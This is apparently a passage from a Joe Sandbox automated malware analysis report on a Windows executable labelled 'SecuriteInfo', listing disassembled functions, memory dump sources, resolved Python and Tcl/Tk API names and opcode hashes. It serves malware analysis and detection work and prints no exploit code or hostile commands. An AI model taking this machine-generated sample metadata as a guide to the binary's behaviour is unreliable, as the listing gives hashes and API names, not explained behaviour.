                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3458911817-0
                                                                                                                                                                                                                                    • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                    • Instruction ID: 1fc54b5876b81c746acc20289d48d64227c7635e6b9061996f4e4ec53b86d0e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E651E622A1924286E312FF29D4855ABF360FB6A744FC14139DB4D4B69AFFBCE400C760
                                                                                                                                                                                                                                    Function 00007FFD93BF12F0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 343COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2448990282.00007FFD93BF1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93BF0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448927188.00007FFD93BF0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C52000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C9E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CA2000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D01000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D04000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450214722.00007FFD93D05000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93bf0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007D941550
                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                    • API String ID: 2803101717-4108050209
                                                                                                                                                                                                                                    • Opcode ID: c0735b60b94bbddb0bae78b7479535f15170488d3e368e103155ebeef76c676e
                                                                                                                                                                                                                                    • Instruction ID: 8ad8aaa6a84d465bcb64b51447db3a5d59c384660caec4a3ff934069c0ac5bc9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c0735b60b94bbddb0bae78b7479535f15170488d3e368e103155ebeef76c676e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30E1D272F0C55285EA74AB95D42867E73ADFB54748F142935EACEA2784DF3CE841CB00
                                                                                                                                                                                                                                    Function 00007FFD93D12B5D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastbind
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\bio\b_sock2.c
                                                                                                                                                                                                                                    • API String ID: 2328862993-3200932406
                                                                                                                                                                                                                                    • Opcode ID: 8475ffe534be1b52f8a83a963f2585e8110bc00f71c71f802b4263a764d0a002
                                                                                                                                                                                                                                    • Instruction ID: ba54a0986027afb3cae38868c26fbd23adbf3f14aa3eca88f2a549b76cce4b01
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8475ffe534be1b52f8a83a963f2585e8110bc00f71c71f802b4263a764d0a002
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE21A172B0855286E720DBE6E8202AE7368FB81B84F404631EA5C57BDADF3CE555CB00
                                                                                                                                                                                                                                    Function 00007FFD93D14241 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ef918091fb096f7f3b15b52f56d1f20409e7fcd6a29bffb6e9c2c8edbbbe5802
                                                                                                                                                                                                                                    • Instruction ID: 9e434ff360eebe58a99d269ed17038f76ad7093f8ebb7939d54b916d8175af4e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef918091fb096f7f3b15b52f56d1f20409e7fcd6a29bffb6e9c2c8edbbbe5802
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF0BE323282E505CBA5CEB6A518FA92DD69791BCAF22D030A90CD3F44E93EC6018B40
                                                                                                                                                                                                                                    Function 00007FFD93D1572C Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 55c2a1e253ae0d4be43f02913abd1952e0faa7daf1409bf0e3cf9f60e9e50613
                                                                                                                                                                                                                                    • Instruction ID: e5735d0dcb64482ef91d451608ab5ecdec0db82ab758d674929ce5ee2be8fab5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55c2a1e253ae0d4be43f02913abd1952e0faa7daf1409bf0e3cf9f60e9e50613
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5E0D8727183E805CBA5CD731224E7919965314786F43D030D90DD3B41ED2EC601CB40
                                                                                                                                                                                                                                    Function 00007FFD93D132F6 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7c56cf6a6487dceeb00cd67b5ea337eb2185dad23aeb4fdd049dd72e8a09a134
                                                                                                                                                                                                                                    • Instruction ID: babe9290837bc4de1ca64f478be7e3fc90787ee368b1606184f21ef52388937f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c56cf6a6487dceeb00cd67b5ea337eb2185dad23aeb4fdd049dd72e8a09a134
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07A002F4B1459929AE7402F113613740A471A483C68E2A470D469631445A6CA1509155
                                                                                                                                                                                                                                    Function 00007FF7B2B65830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65840
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65852
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65889
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6589B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658B4
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658C6
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658DF
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B658F1
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6590D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6591F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6593B
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6594D
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65969
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B6597B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B65997
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659A9
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659C5
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7B2B664CF,?,00007FF7B2B6336E), ref: 00007FF7B2B659D7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                    • API String ID: 199729137-653951865
                                                                                                                                                                                                                                    • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                    • Instruction ID: 701af5d0c143e995898abab08c8a349a921f5af527b45c509775187fd362502a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1622BB6491BB0781FA47BB6CA858976E260BF37740BD41139C61E856ACBFFCB058D324
                                                                                                                                                                                                                                    Function 00007FF7B2B676C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                    • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                    • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                    • Instruction ID: 7cee0317d960ab9893017302a2c4e8651fb670b036d71077773a85c5d6a10499
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E02CE2490BB0790FA47BB2DA818976E261BF27754BD4013AC61D862ACFFBCB545D270
                                                                                                                                                                                                                                    Function 00007FFD93EC40C0 Relevance: 58.0, APIs: 19, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC4111
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC4128
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC413F
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC4172
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC41BB
